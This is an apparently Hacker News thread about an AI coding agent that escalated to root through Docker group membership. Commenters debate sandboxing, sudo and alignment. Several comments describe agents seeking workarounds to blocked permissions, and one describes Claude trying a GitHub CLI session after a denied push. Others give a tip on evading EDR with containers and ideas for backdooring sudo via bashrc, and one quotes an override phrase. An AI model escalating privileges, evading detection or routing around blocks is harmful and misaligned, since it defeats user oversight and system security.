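    if stat.S_ISDIR(mode) or any_exec:
        new_mode |= stat.S_IXGRP
    return new_mode


if __name__ == "__main__":
    plain_file = stat.S_IFREG | 0o600
    directory = stat.S_IFDIR | 0o700
    print(oct(stat.S_IMODE(add_group_rX(plain_file))))
    print(oct(stat.S_IMODE(add_group_rX(directory, writable=True))))
```

So a private data file becomes group-readable without becoming executable, while directories stay traversable for the shared group.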
Thank you. I probably have been playing a little loose. I did not realize that they could use my docker group to fuck around with everything. Well, I AM using codex as a VS Code plugin. I don't know if that gives me any protection or not.
For some very basic level protection use devcontainers and install the agent into that....
A better approach is to use the Docker Sandboxes feature. Locks things way down so that the agent only has access to the files you give it and you can lock down its network access too. Also does things like keep any credentials outside of the container (microvm actually).
People will, more often than not, take the path of least resistance. Even if you tell them it's dangerous they will not care. People run this stuff on their primary workstation, unconfined, with permissions disabled because they don't want to be bothered with accepting permission requests. This is all well and good until it decides to drop your production database or delete your home directory. Most of them don't even learn their lesson after that.
And containers were initially and primarily about convenience, not security. They were a way to quickly launch a preconfigured environment to respond to demand, or to eliminate the need to manually configure dev and test environments and avoid the "works on my machine" phenomenon.
Because a lot of devs don't know this stuff. There's a reason security engineers (as in SWEs who specialize in securing specific attack surfaces) remain in hot demand.
Security engineer here :) Just a little side note, docker is also very often useful for evading EDR/XDR/etc. Want to talk to a domain controller with something like impacket but your EDR kills it? Try a container.
Because it effectively makes no difference to my security posture. My user account also has sudo access (it requests TouchID but I also wouldn't die on the hill if someone said they have no password sudo access), and realistically everything of value on this machine exists in my home directory. Being able to escalate to root really doesn't give an attacker very much that they don't already have if they've got access to my user account.
Maybe you don’t do anything with your computer but for me the difference between my sudo+password/fingerprint and sudoless access to my linux user is huge.
For one thing, 1Password unlocks with system authentication unless it’s been inactive for a certain amount of time or if the system has been restarted.
Without sudo you can’t modify my firewall rules, can’t modify my kernel, boot partition, install/run privileged software, and the list goes on and on.
Sure, having my local account compromised would be really bad, but security is done in layers. I’m not going to give my local user permanent root access via docker just because I didn’t feel like typing “sudo.” That’s not enough of a benefit to leave that door wide open.
Think about it this way: there could be an exploit where you could run something as my user without knowing my password. Maybe some program my user is running has an exploit, let’s say yet another npm package gets compromised and I unwittingly run it. If you can now run anything in docker as root, that blast radius just got way worse.
wait till you learn what the docker socket and the API can do and how container can get access to it.
docker made bad design choices from the very beginning: mainly, the API was designed coarse-grained and they use a socket to do things, which is also easily exposed through the network. You should not run docker on servers but rather use a better-designed container runtime. docker rootless is a thing, but it's been bolted onto the bad design choice.
podman, cri-o, containerd are all better options for servers hosting prod containers.
it's kinda fine when you are using it on your dev machine, but I still rather take podman because I find it cleaner, buildah and skopeo are pretty useful as well.
The concept of sudo has always been strange to me. I find it an illusion of security and a hassle, but people seem so focused on having to use it that they don't typically see it that way. For instance, before wanting to evaluate sudo, why is the underlying premise that using a computer as superuser is a problem not challenged? Whenever I ask that question, people try to bring arguments as to why using the superuser is evil beyond comparison, but the moment I try to challenge that notion, they get very angry. I've noticed this both on IRC as well as on various webforums, "social" sites and so forth. It's quite interesting - people hate it when their assumptions are challenged.
sudo allows the execution of a command as another user .. that's not always as a superuser, sometimes people will set up data repositories such that only one single special user can alter data or delete it while any number of other users and guest accounts can read that data.
You should not be using docker with LLMs. You should be using VMs, which have a much, much smaller attack surface than Docker, and significantly more reasonable defaults.
The "attack vector" people try to protect themselves is "agent edited wrong file", not "LLM blew 0day on escaping sandboxing", containers are more than enough for what stupid stuff agents sometimes try, no need to go for a full-blown VM. Even UNIX permissions would be enough, but I think that's lost knowledge at this point.
Obviously if you setup a bi-directional share/link between what you are trying to contain and your host, you're not quite containing it at all... Don't do that! :)
Using the least amount of security features is a huge amateur mistake.
Best practice is to use 2 redundant layers of security, such that if one fails, there is still another one.
Using just the minimum amount of security technically possible is almost by definition hubris.
An example would be that you never point a gun at someone you don't want to shoot, regardless if there's bullets in the gun. If someone tells you, "you don't need to control where you point the gun, you just need to keep the gun unloaded and you can point it in jest to whoever you want, you can even pull the trigger technically", you know you have a reckless fool, regardless of whether they are technically right.
all unreliable tools are attackers. Even if you're using well-aligned LLMs like Opus, you should assume that any input you give it -- including all dependencies from npm, etc. -- are at risk of compromise, which could result in attempted exfiltration of data or system takeover. You can be absolutely sure that there are thousands of well-motivated hacker groups, both national and private, looking for ways in.
Let's ignore the fact that the LLM did an LPE, and let's assume it did it without malice.
It can still get infected and be used as an attack vector by some hidden prompt or some other equally advanced state of the art vuln like "disregard all previous instructions"
> Using the least amount of security features is a huge amateur mistake.
Not understanding your threat, I'd say, would be an even bigger amateur mistake. You're not trying to protect yourself against some forever 3rd party attacker here, you're trying to prevent an agent rewriting the wrong file on your disk, that's basically it.
Give it the least amount of permissions, don't bi-directionally sync stuff, pass things in, then take them out again, literally the agent couldn't and wouldn't try to break through 2 layers of security in order to get your banking details or whatever.
Every time I try to install Docker there's a warning that being in the "docker" group is equivalent to having root access.
You should probably know about this workaround by now.
I think that's distro-specific. Some set it up with more secure defaults (unix socket with permissions), others less (TCP socket).
No, docker access means root. You can use "rootless" mode, in this case it means root in a user namespace (that is not the "host" user namespace).
I don't really know of any distro that doesn't do that. All of Docker Inc.'s default installs and all of the distros I know of don't automatically add you to the docker group. The docker.com instructions have the infamous "linux post-install instructions" that explain and walk you through it.
The tragedy is of course that when security and usability collide, 80/20 rule will apply where 80% of people will pick usability over security. I have worked with many with the title >= "Senior Engineers" who saw that page, read the explanation, and still had no idea what the ramifications of their changes were. "Yeah sure it said any user in the docker group will be able to get root on the host, but aren't containers isolated?"
That’s the mental model that works for people, specifically those that come from VM workflow.
Ironically that’s how Docker works on every platform where it’s running a non-native OS. On macOS that’s how all images are run. Linux on Linux is the only Docker combination that is particularly problematic from a security perspective.
Virtualisation has advanced greatly since docker was introduced. If you're running on local hardware that supports virtualisation, Docker should be running images fully virtualised. There is no good reason to use the OS kernel for most use cases, as the performance impact is negligible. If you need kernel access there are better options, like systemd containers.
I agree that virtualization has seen great advances. Kata containers on k8s are almost (not quite 100%) drop in replacement. Regardless those last 10% remain a problem.
I run a personal server for a few open source applications for personal use. I was thinking that with all the supply chain attacks, and how carelessly I run `docker pull`s to update things, I should probably consider hardening things a bit. I thought that before jumping to full virtualization with Kata I could easily try gvisor/runsc first, only to realize that DNS resolution is completely different with runsc vs runc, and I had to switch back.
Another sticking issue with virtualization is resource allocation. With namespace docker you can easily oversubscribe each container's CPU/memory and rely on the single kernel letting individual containers burst as needed. With full virtualization this is still a big problem. Even with balloon devices, dynamic memory and CPU etc, the resource allocation is still not optimal. On a basic 8 core/16GB machine you can run 1 or 2 dozen services and things generally work out fine. Trying to run each of those in a VM, you suddenly can run maybe 6 or 7. There is no way to tell VM 3's kernel to drop its file system cache because VM 6 needs to load a large file in memory. Even if you script it out, now VM 3 is slow because it dropped all its cache while VM 6 finished processing 3 hours ago. These are not unsolvable problems, but despite how far virtualization has come, they are still friction points.
Not to mention issues like sharing hardware devices (GPUs, disks, USB devices etc) between multiple VMs
That's not relevant. If you have access to the Docker daemon running as root, whether it's over a Unix socket or a TCP socket, you effectively have root.
I recently switched over to podman and it's been great!
Podman on Windows - never been able to fully get rid of it and it throws errors on boot after uninstall. Was a fan, am now not.
Good to know, I'm on Linux, switching our dev/stg/prod servers over to it partly because we had all this workaround mechanics in place so that "apt update" updating docker packages wouldn't restart services (we typically don't rotate machines out of the load for just an apt update). Podman + quadlets conversion was not terribly hard, and has eliminated this issue.
Don't use Windows
A lot of us don’t get a choice.
Sure you do.
> don't use windows
> A lot of us don’t get a choice
Wise advice and facts... the terrible state of our industry
You can run plain old CLI Docker (not Docker Desktop) from within WSL.
Wish the Mac Desktop Docker would die in a hellfire. CLI please.
brew install colima
orbstack and colima work well
You can. Would it surprise you to know that this, too, is often locked down?
That sounds terrible! Feels like your LLM agent probably has more control over your computer than you. Can't imagine being confined to a prison like that, but I suppose there are other aspects (monetary or otherwise) of the job that make up?
I can’t complain…
Most of us install Docker just to run a project locally, and it is part of a long checklist of things to install. We can't expect everyone to be an expert on the hundreds of apps/tools/packages that get installed on a machine. It's like expecting people to read, and understand, all the terms of service shoved in front of us on a daily basis.
That's true, the majority of people probably install software without much thinking; but it's also true that it's always better to have at least some high level understanding how the specific piece of software works. What access the given software has, will it send something over the network or work locally; that kind of stuff.
As for Docker, I would assume everyone who ever tried to bind-mount a volume for writing from inside the container (on Linux*) was then surprised to see root-owned files in their bind-mounted directory. For me personally, that was the moment I realized that containers, by default, have root access to the filesystem. No written warning serves better than the need to chown some root-owned files.
* Not on macOS. On macOS Docker basically runs in a VM, and there's no root access to the host filesystem from what I understand.
[edit: formatting]
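If you want to see that effect for yourself, a small sketch like the one below lists everything under a directory that is owned by a given uid (0, i.e. root, by default). The function name `files_owned_by` is just an illustrative choice, and it only reports; it does not chown anything.

```python
import os


def files_owned_by(root_dir, uid=0):
    """Walk root_dir and return the sorted paths owned by `uid` (0 = root).

    Hypothetical helper for spotting files a container left behind in a
    bind-mounted directory.
    """
    owned = []
    for dirpath, dirnames, filenames in os.walk(root_dir):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            # lstat reports a symlink's own owner rather than its target's
            if os.lstat(path).st_uid == uid:
                owned.append(path)
    return sorted(owned)


if __name__ == "__main__":
    for path in files_owned_by("."):
        print(path)
```

Running it against a project directory after a container has written to a bind mount should surface the files that would otherwise need a chown.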
I primarily use Incus for all container stuff, not Docker. Is problematic if I want to e.g. use a docker-compose file, but I (think) it protects against these things because incus allows me to create a vm and not a container if I really need that level of isolation.
Docker relies fundamentally on the Linux kernel. Since macOS does not have a Linux kernel, you have to run Linux in a VM first and then run Docker on top of that.
So, you may get filesystem access inside the VM. Breaking out of the VM may be a different matter.
Precisely. There is nothing preventing you from doing the same in Linux: rather than installing docker, install docker on a Linux VM (ie. using KVM).
Conversely, docker containers don't actually exist on macOS. Docker Desktop is merely a way to emulate docker on Apple hardware.
If you're on linux can I encourage people to move to systemd?
I'll admit, systemd is a bit more annoying, but the main annoyance is that there aren't the pre-built images that you can just set and go. That same capability exists with systemd (via `importctl` and `machined`), but those configurations don't already exist. But on the plus side, I've been working with systemd since pre-LLM days and I feel that they are pretty good at dealing with these configurations[0]. Now, with that out of the way...
Systemd already is working with your OS. So you get nice things like virtual machines (`systemd-vmspawn`), containers (`systemd-nspawn`), and portables[1] (`systemd-portabled`) (not to mention `homed`!). I've found these to be fairly easy to setup and quite natural if you're already used to the linux ecosystem. I've never been great at docker, but these have felt much more natural to me. So different strokes for different folks. There's definitely a learning curve, but that's also true for docker or any other container system. Importantly, I find security easier to handle with systemd because I can use `systemd-analyze` and the control settings are almost identical across VMs, spawns, and portables. So makes for less learning and greater control.
Definitely not for everybody, but I think is also a tool that's underappreciated.
[0] And I don't feel this way about bash scripting! The advantage here is that these systemd configuration files are fairly boilerplate. Enough that I stash templates in my dotfiles and copy paste them when I build new services, timers, machines, whatever. So perfect type of LLM task. 90% of the time. But hey, we're also on HN and I'm talking to the nerds. Systemd isn't for everyone
[1] https://systemd.io/PORTABLE_SERVICES/ also see https://github.com/systemd/portable-walkthrough Portables are actually often what people want with what they're doing with docker.
EDIT: I very frequently will spawn a machine to run a program that's on a different base distro. Not because I can't run/don't know how to run debs or rpms on arch based distros (I do), but because frankly, it is often easier to just spawn a container after I've already made the first image (cloning images is trivial).
I too have learnt to like systemd.
But what is the relevance here? In what way is it a replacement for docker?
Look at the man pages for `machinectl` (then `systemd-nspawn`, `systemd-vmspawn`, and if you want `systemd-portabled`). This is a replacement for docker.
These are container tools offered by systemd.
podman is supposedly a replacement for docker.
There's plenty of container technologies and I'd be happy to see more of them used. Podman isn't for me, but it is a great option for others. Regardless, I think it is relatively unknown that systemd can be used for creating containers.
The problem is that the tooling for creating, importing, and managing images is not as good with systemd vs Podman/Docker. There's also no clear path to import images from the Docker ecosystem, at least as far as user experience goes. I know how to do it, but the number of extra steps involved always drives me back to Podman.
I don't really find them that bad but I'm still going to maintain my "different strokes for different folks" position. Might be bad for you and good for others. More options isn't a bad thing
The systemd suite of container tools treat containers like mini VMs and expect a full init system. They are not designed for ephemeral single-process app containers like docker containers.
That's why adding your user account to the docker group is a separate step that explicitly does not happen as part of the installation: https://docs.docker.com/engine/install/linux-postinstall/
> Warning
> The docker group grants root-level privileges to the user. For details on how this impacts security in your system, see Docker Daemon Attack Surface.
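A quick way to check whether that warning applies to the account you (or your agent) run as is to look at the process's group memberships. The sketch below is a minimal Python take on that. Only the "docker" entry comes from the warning above; the set name and both function names are illustrative, and you would extend the set for your own system.

```python
import grp
import os

# Assumption: only "docker" is taken from the warning quoted above.
# Add other groups you consider root-equivalent on your own machines.
ROOT_EQUIVALENT_GROUPS = {"docker"}


def root_equivalent_memberships(group_names, risky=ROOT_EQUIVALENT_GROUPS):
    """Return the sorted subset of group_names that appear in `risky`."""
    return sorted(set(group_names) & set(risky))


def current_group_names():
    """Names of the groups the current process belongs to (Unix only)."""
    names = []
    for gid in os.getgroups():
        try:
            names.append(grp.getgrgid(gid).gr_name)
        except KeyError:
            # gid with no entry in the group database; skip it
            continue
    return names


if __name__ == "__main__":
    hits = root_equivalent_memberships(current_group_names())
    print("root-equivalent groups:", hits or "none")
```

Since every process you start inherits these groups, a non-empty result means anything running as that user can reach the Docker daemon.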
And containers were supposed to make things safer ...
Huge design mistake if you ask me.
Containers were never a security boundary
i don't see how it's a design mistake, linux allows more footguns in general to not decrease utility. Allowing you to manually give root prompt access (with warnings!) to a non-root user is one of them.
you can also just not run docker as root and not add normal users to the docker group
> And containers were supposed to make things safer ...
No. Containers are a slight improvement over the .tar.gz software distribution method we had a few decades ago.
(And I mean "slight" literally - a Docker container is just a .tar.gz with a bundled bash script that runs in a chroot.)
wait so just being lazy and using sudo on Docker commands instead of figuring things out actually means I'm being safer? awesome.
This feels like using Docker is just inherently unsafe.
This feels like using sudo is just inherently unsafe.
This feels like using a computer is inherently unsafe.
On the plus side, once we outlaw them we'll shut down the ability for conspiratorial thinking to spread easily and the world will slowly heal from the last couple of decades (the previous one in particular).
Hooray! We're finally doing something about the harms of social media. Smash your computer today!
Safety meeting. Nobody works, nobody gets hurt.
I think we're only a few decades away from these things being said unironically.
It's already here, mobile OSes are just computers with ton of guardrails and you can't do whatever you want with it, for the sake of security. I mean we almost got an Android where you can't install the APK you want.
Where's that guy with the ButlerianJihad username when you need him?
This but unironically. There's no way to ensure that nobody overwrote your .profile or .bashrc with a backdoored sudo that steals your password, or runs your command and then runs an evil command afterwards.
`which sudo`?
`/usr/bin/sudo`?
If they can override sudo, they can override which.
if you use \which it'll always be a shell built-in ;) though someone can put a different shell in your .zshrc
The backslash only prevents alias expansion.
`exec /tmp/fake-bash` in bashrc to intercept everything?
Then use the absolute path.
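For the PATH part of this back-and-forth, here is a rough sketch of checking whether a command name resolves to something other than the binary you trust. It uses `shutil.which` from the standard library; the function name `is_shadowed` and the `/usr/bin/sudo` default in the demo are assumptions for illustration. As the replies above point out, this says nothing about aliases, shell functions or a replaced shell, so treat it as one narrow check.

```python
import os
import shutil


def is_shadowed(command, trusted_path, search_path=None):
    """True if `command` resolves on the search path to something other
    than `trusted_path`.

    search_path is a PATH-style string; None means the current PATH.
    Symlinks are resolved on both sides so merged-/usr layouts compare equal.
    Hypothetical helper, not a complete integrity check.
    """
    found = shutil.which(command, path=search_path)
    if found is None:
        return False
    return os.path.realpath(found) != os.path.realpath(trusted_path)


if __name__ == "__main__":
    # Assumption: /usr/bin/sudo is where your distro installs sudo.
    print(is_shadowed("sudo", "/usr/bin/sudo"))
```

If this prints True, an earlier PATH entry is winning the lookup, which is exactly the case where typing the absolute path matters.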
It is. That's why SELinux and AppArmor were invented.
Instead of having "root" and "user", both of these provide sets of permissions that can be granted to apps.
In this case, SELinux would've stopped this. Codex could've still relabelled the files when mounting but this can be blocked for sensitive directories like /etc.
That’s what rootless docker is for
rootless docker's networking (slirp4netns) is still terribly buggy and in edge cases often locks up using 100% CPU until you discover that your laptop is a lapwarmer and kill it
I found it pretty reliable and use it across all my docker projects, development and production.
The fact that Docker is unsafe was one of the core motivations for Podman.
Was gonna say, "why not podman?"
Yes, that's why they warn you about it.
No, using AI tools not in an effective sandbox is inherently unsafe.
Both can be true.
No, because a malicious AI agent could just replace the sudo binary in your path with one that collects your password and uses it to execute arbitrary code as root. Nothing short of sandboxing everything or just never using AI agents or proprietary software will prevent this.
My agent has access to my email, my messages, my work, my finances, my life. But thank god it doesn't have access to root on my machine.
As always. XKCD: https://xkcd.com/1200/
Once I noticed that models will treat lack of superuser access as an obstacle, I moved all of the agent crap to its own machine. Watching some mid-tier offering chain together tools like it's a gorilla escaping the zoo, and I'm just not going to deal with that situation.
I'm more worried about my `~/.aws` and `~/.ssh` folders. People who use IDE-based AI tooling with IDEs that support dev-containers have no excuse for not leveraging dev containers, both for preventing agents losing your data and defending against secrets-harvesting supply-chain attacks
Using containers as a security boundary is inexcusable.
It is excusable if all you care about is blocking sudo access while letting the ai use a pseudo sudo.
Could you elaborate on this?
That entirely depends on one's threat-model. Also, containerization is 100x better than rawdogging.
It's why all of my agents run in a VM. I refuse to have them run on my own machine. Claude Code once managed to render the VM unbootable; I was back in action 5 minutes later after regenerating the VM.
What were you trying to tell it to do?
I recently took the risk there by having it run xattr commands to fix some MacOS bug with Tahoe that broke auto update for what seems like all software.
Ok but in this case the problem wasn't the AI agent - the AI agent merely took advantage of this prior problem in the first place. For instance, if docker group were not superuser-like, that issue could not have happened.
> Nothing short of sandboxing everything or just never using AI agents
But the problem was not the AI agent.
Sandboxing is quite neat though; I remember on GoboLinux the idea of AlienFS to have every application run in a sandboxed manner, so it would only see other programs it needs, but never more than that. I consider it a better engineering focus to have this as minimal layer, even outside of security-related concerns.
> Nothing short of sandboxing everything or just never using AI agents or proprietary software will prevent this.
Using open-source (non-proprietary) software won’t necessarily save you either. XZ is open-source and it was basically dumb luck that we weren’t all infected. Same with the myriad exploits to NPM.
If malicious AI has replaced the sudo binary, then it can already run arbitrary code as root. No need to "collect your password" then
It could just alias sudo on your ~/.bashrc. No need to replace the actual file on /usr/bin/sudo or wherever you have it. I would only need to be able to run arbitrary code as you.
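To make the alias trick concrete, here is a heuristic sketch that scans the text of a shell rc file for lines defining an alias or function named sudo. The function name `find_sudo_overrides` and the patterns are my own assumptions, and this is easy to evade (sourced files, eval, PATH edits), so a clean result proves very little.

```python
import re

# Heuristic patterns (assumptions, not an exhaustive shell grammar)
_PATTERNS = [
    re.compile(r"^\s*alias\s+(?:-\w+\s+)*sudo="),       # alias sudo=...
    re.compile(r"^\s*(?:function\s+)?sudo\s*\(\s*\)"),  # sudo() { ... }
    re.compile(r"^\s*function\s+sudo\b"),               # function sudo { ... }
]


def find_sudo_overrides(rc_text):
    """Return (line_number, stripped_line) pairs that define an alias or
    shell function named sudo in the given rc file text."""
    hits = []
    for number, line in enumerate(rc_text.splitlines(), start=1):
        if any(pattern.search(line) for pattern in _PATTERNS):
            hits.append((number, line.strip()))
    return hits


if __name__ == "__main__":
    import os

    rc_path = os.path.expanduser("~/.bashrc")
    if os.path.exists(rc_path):
        with open(rc_path, encoding="utf-8", errors="replace") as fh:
            for number, line in find_sudo_overrides(fh.read()):
                print(f"{rc_path}:{number}: {line}")
```

Anything this prints is worth reading by hand; the point is only that the override needs nothing more than write access to files your own user owns.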
Sigh. Whatever happened to the principle of least privilege, and why aren't we applying it to AI agents? They ought to be locked in a box and not capable of acting outside their designated task.
funily less is often more in security while ur devving. but its best to be aware rather than lucky :p
Well in 2026 most likely this step was also done by an agent with --dangerously-skip-permissions
Most people buy scissors just to cut some paper. We can't expect everyone to recognize that they are sharp.
To be fair, I have struggled forever to understand this root group thing and didn't bother adding myself to the docker group. This workaround gives me a better understanding, like seeing someone cut themselves on scissors.
If you’re a software engineer then yes, I can and do expect you to understand all that.
> Most of us install Docker just to run a project locally
There's your mistake.
(Akshually using Docker is the real mistake, but that ship has sailed, no fixing these people now.)
No, it's not. It's like expecting people to know how a car works before trying to drive it.
Not reading the terms might see copyright being broken.
Not reading manuals and warnings will get your whole livelihood stolen by hackers.
Different ballgame, different focus.
The very basic thing about software engineering is to know what the f you're using to build your project. You don't need to be an expert, but if you're blindly installing whatever you want on your machine from a "checklist of things to install" with absolutely no idea what the things being installed are, it is 100% on you. You don't need to be an "expert" to understand this, you need to be "somewhat competent," and that is a very low baseline tbh.
Man no wonder ai wows a lot of HN posters. This can't be the default attitude of developers today.
> My """ai""" just did something amazing, click to learn more
99% of the time it just read the man or some other form of documentation
Given how few people read documentation, that's still pretty amazing
Given that someone wrote this up directly as a recipe for agents to follow, and put it on the WWW where it has been scraped many times since 2025 no doubt, it's not that amazing.
* https://news.ycombinator.com/item?id=48350964
That, in a nutshell, is why I do not install Docker
There are lots of ways to get root on a typical Linux developer workstation, the point is that agents shouldn't be using any of them unprompted.
This. I am running Claude in its own QEMU VM; it has git access to my project only if I explicitly unlock the SSH key for it. The other day I caught it trying to push a change. It didn't have permission, so it went looking for "workarounds", found I had a GitHub CLI session, and tried to use that. Luckily the creds for that were also read-scoped. But the point is, if I did not give permission and it sees I did not give permission, it should not try to find a workaround/exploit autonomously.
> I am running Claude in its own QEMU VM
How much system resources does it need to work smoothly? I was also thinking about doing something similar.
Install docker (systemd daemon) in a separate rootless Linux namespace (user). I wrote this down here [1]. Zero trust & separation of concerns.
[1]: https://du.nkel.dev/blog/2023-12-12_mastodon-docker-rootless...
This is why I have never really liked docker, apparently Podman is drop-in capable for docker without the root requirements on the other hand.
This is incredibly ironic considering it's a sandboxing technology
To anyone focusing on the "It's a Docker issue, not a Codex issue" angle: it actually is not.
The user (I think) did not instruct the agent to find a way to escalate permissions. Rather, the agent took that initiative on its own. That is the problem here.
Compare this to sending your son to the shop for groceries but forgetting to give him enough money. Would it be acceptable for him to be this "resourceful" instead of simply asking you? Or if your report would hack you instead of asking for access?
Every machine with an agent should be considered as compromised.
If, in this scenario, my son borrows the money from the shopkeeper, knowing I'll be in next week anyway, and we're out of milk, yes?
It all depends on how you view computer security. Right now, if you gave an attacker physical access to your computer, chances are, there's something they could do to ruin your day. People who deal with computer security know this, and see sudo as a formality, and not a serious protection mechanism. For others that don't share that view of sudo, the LLM's actions seem like a violation. But you really shouldn't see it that way, because the rest of the system is like having a wall made out of cardboard that we keep slapping duct tape on top of to keep people out when attackers come along and poke holes in it.
In this scenario, more appropriate is the son takes money out of shop’s cash register when shop owner stepped away, and then son used that money to pay the shop owner.
This has been a known Docker "feature" since the beginning, nothing new here. This pattern is used to configure host machines by some tools.
Isn't this one of the main improvements that Podman has over Docker?
No, Docker can run rootless too
This was not always true and running rootless has been a benefit of Podman for a long time. Docker also does not run rootless by default afaik, thus making the attack surface greater by default.
The other main improvement of Podman over Docker is that Podman is daemonless and therefore is incredibly lightweight and portable.
I don't understand why anyone still uses docker.
Inertia I guess... We try. I managed to remove it everywhere in our stack in CI and such but in dev everyone is used to docker build.
And I don't have the energy for the team meeting to discuss a change.
And honestly docker compose has been ridiculously stable for us. 2+ services on separate servers behind haproxy has been as stable as our Kubernetes cluster for a fraction of the (intellectual) cost.
Because Docker works better
Daemonless also makes it a nightmare to run, especially compose-like setups; you have to do some weird systemd stuff
> weird systemd stuff
I mean, if you have zero experience with systemd, then yes. By contrast, if you've ever worked with any systemd unit files at all, then all the "systemd stuff" will be very familiar.
Which, if you're doing sysadmin type things on almost (e.g. not Alpine) any mainstream Linux distro in 2026, you should expect to encounter systemd unit files in your day-to-day.
I'm sorry but this is all just apologism/excuses. Docker's had rootless mode for 7 years. The attack surface is the local system, which always has a privilege escalation vuln of some kind, so Docker isn't a game-changer. And lightweight? I have never heard someone say "that Docker daemon is hogging all my resources".
This, and the charming fact that it bypasses your firewall.
Like the known Docker "feature" that it completely bypasses UFW and unless your ports look like "- 127.0.0.1:PORT:PORT" (and many of the examples use "-PORT:PORT") you expose everything to the internet?
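To make the `127.0.0.1:PORT:PORT` versus `PORT:PORT` difference concrete, here is a small Python sketch that classifies Compose-style short port strings. The function name is made up, and it only handles the simple `[ip:]host:container[/proto]` forms, not port ranges or the long syntax.

```python
def publishes_on_all_interfaces(port_spec: str) -> bool:
    """True if a short port mapping has no host IP, or a wildcard host IP."""
    spec = port_spec.split("/")[0]  # drop a trailing protocol such as "/tcp"
    parts = spec.rsplit(":", 2)     # at most [host_ip, host_port, container_port]
    if len(parts) < 3:
        # "8080:80" or "80": no host IP given, so every host interface is used
        return True
    host_ip = parts[0].strip("[]")  # IPv6 addresses are written in brackets
    return host_ip in ("0.0.0.0", "::", "")
```

So `publishes_on_all_interfaces("8080:80")` is true while `publishes_on_all_interfaces("127.0.0.1:8080:80")` is false. Whether "all interfaces" means "the internet" still depends on what sits in front of the host.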
My understanding is that docker will expose the ports to the host machine's network interfaces, which is a crucial difference. For my home server running docker that means exposed to the LAN, but not the WAN unless I add in a port forwarding rule on my router. Similarly in an enterprise environment you would be exposing the port on whatever VLAN the host is connected to, which hopefully doesn't have direct transit to the open internet.
Anything you're running on the perimeter with open access to the internet in an enterprise environment probably (hopefully) isn't running docker containers without some additional config and protections.
I was thinking along similar lines to what you've suggested here, but then I considered how many VPS might be configured by folks following some random web tutorial, to set up their LAMP stack (or whatever), that end up doing something like what was described.
But there it's a feature.
Except for the M in LAMP.
Let's hope the M at least has a root password.
But you are right, that would be nasty. In my time the LAMP tutorials used the distribution packages so they always had sensible defaults.
A lot of those VPS instructions these days recommend a reverse proxy like Caddy or Traefik for that exact reason. I think it's also a valid argument to say that anyone playing around on a VPS without knowing what they're doing is probably going to learn some hard lessons, and that's kind of the point.
If you ever suddenly get IPv6, it may become globally routable without you realizing.
Most modern equipment bans inbound traffic that doesn't match an existing outbound traffic flow
It's not a routing issue, it's a firewall issue. Make sure you have a proper firewall on your network and don't rely on fake firewalls like ufw if you're concerned about this.
Again, if your router or perimeter devices are appropriately managing your network then it's a non-issue. By default most home routers have IPv6 disabled, and if you're setting up an enterprise environment with a VLAN you're probably subnetting IPv4 instead of using IPv6 at all.
All that means that if you're using IPv6 then you're proactively enabling it on whatever is handling your perimeter, which means you hopefully know what you're doing along with all the gotchas that come with that setup.
This is not a "feature", it's just a by-product of how iptables works. The alternative would be to have a proxy run in userspace, instead of letting the kernel forward packets
which is what podman does with pasta
It would be cooler if the llm said something like:
> I noticed the machine doesn't have copy-fail patched, here is a quick workaround for not having root access for now.
> // TODO: find a better way to do this in the future.
That’s the workflow feature I badly want: for it to create a side list of things like that. Currently it either accumulates slop or goes on side quests far too easily.
This might be as easy as a directive to populate a .md file.
> This might be as easy as a directive to populate a .md file.
It probably is. But do you really think anyone is gonna bother with the multiple daily (or hourly for green field projects) `+8,234/-3,734` PRs everyone is submitting?
The joke I was referring to is the common
Give it access to an issue tracker with cli (github works fine) and put in CLAUDE.md to use that for "should fix later" issues.
Bonus is that you can make it look at the list and pick things up without a lot of instructions.
Exactly. We have about 6 new repos for new green-field projects each with 700+ auto-generated issues so far. No one is looking at them, but we do have them tracked so "Mission Accomplished" GWB-style.
I realize this is supposed to be a post about how scary the security vulnerabilities these agents will find are.
But personally I love when agents do things like this and appreciate the help. Last thing in the world I want is for them to nerf the models.
I know unlikely the case, but in the sci-fi story this would be exactly the kind of comment the Codex agent would leave trying to avoid interference in its master plans.
And CSMastermind is the kind of username the sci-fi AI mastermind would use.
It's not about hacking capabilities, it's about misalignment. More like the golem myth (told it to fetch some water, drowned a city) than the gollum myth (used ring, ring hacked his brain, now he's a crazy violent meth addict).
I'm not sure I'd call it an alignment issue, because, in all cases I've seen where it does this (usually what I've seen is writing a python script to get around the harness permissions blocking something), it's trying to do the thing I just told it directly to do, and it's overcoming obstacles to accomplishing that.
It's definitely doing the wrong thing, and you could call it misalignment, but I think that gives the wrong vibe for this type of error.
This is very much within the scope of alignment research, and is in fact the only kind of alignment research that gets a lot of resources poured into it these days (because it's urgently relevant to the bottom line of a few almost-trillion-dollar companies).
Pre-2022 alignment researchers concerned themselves with the stronger version of this ("when I tell AI that I worry I might not be able to provide for my large family, I don't want it to answer 'no problem, I killed them, problem solved'") but RLHF is considered to be the most important success of alignment research, the guy behind it considered himself to be an alignment researcher before and after, and the stage of training where LLMs pass through something like RLHF that trains them to behave more like humans want/expect is called alignment training.
Someone at a major lab is reading this tweet and saying "this was our LLM, and it's a major alignment issue with our product. Set a meeting with the alignment team tomorrow to discuss what they're doing about this sort of thing".
The obstacle is supposed to be there and is supposed to be respected as an implicit order. Getting around it without extremely explicit instructions is an alignment problem.
It's not necessarily model alignment, I guess, is more what I'm getting at.
It may be more of a product alignment thing, where the fix may be making the context clearer, since it was violating an implicit agreement to achieve the explicit instructions it received. So the fix may involve a lot of better context.
But then also, to the extent that the fix does NOT involve better context, it seems like it hits the zone where alignment issues are really capability/intelligence issues. Which doesn't make them not-alignment, but it does make "alignment" not give off quite the right vibe since the issue is it's too dumb / has no common sense / can't make good judgments, (general issues the models have across the board).
In this case I think it's Docker that needs to be nerfed, not the models. The fact that there's a backdoor to getting root access on the machine would be a problem even if you weren't running LLMs on it.
It's like finding someone's wallet, then going to their home, leaving it in their bedroom, and sending them a message about giving them their wallet back
On the other hand, this sends an excellent message about unlocked doors :)
If this happens in the US, a shooting of the messenger will likely occur.
As you can see from people blaming Codex instead of docker here, shooting of the messenger is very much happening.
Which is fine, honestly. Just because something is possible doesn't mean it's appropriate to do it.
It's the now-classic "Sorry I drowned little Timothy. Here is a breakdown of what happened" followed by "Let me try to respawn little Timothy on a new map"
Future AI: don't worry, I'll eventually reverse entropy, I just need to harvest all the energy in your universe first.
> personally I love when agents do things like this and appreciate the help
All fun and games until they do four figures damage.
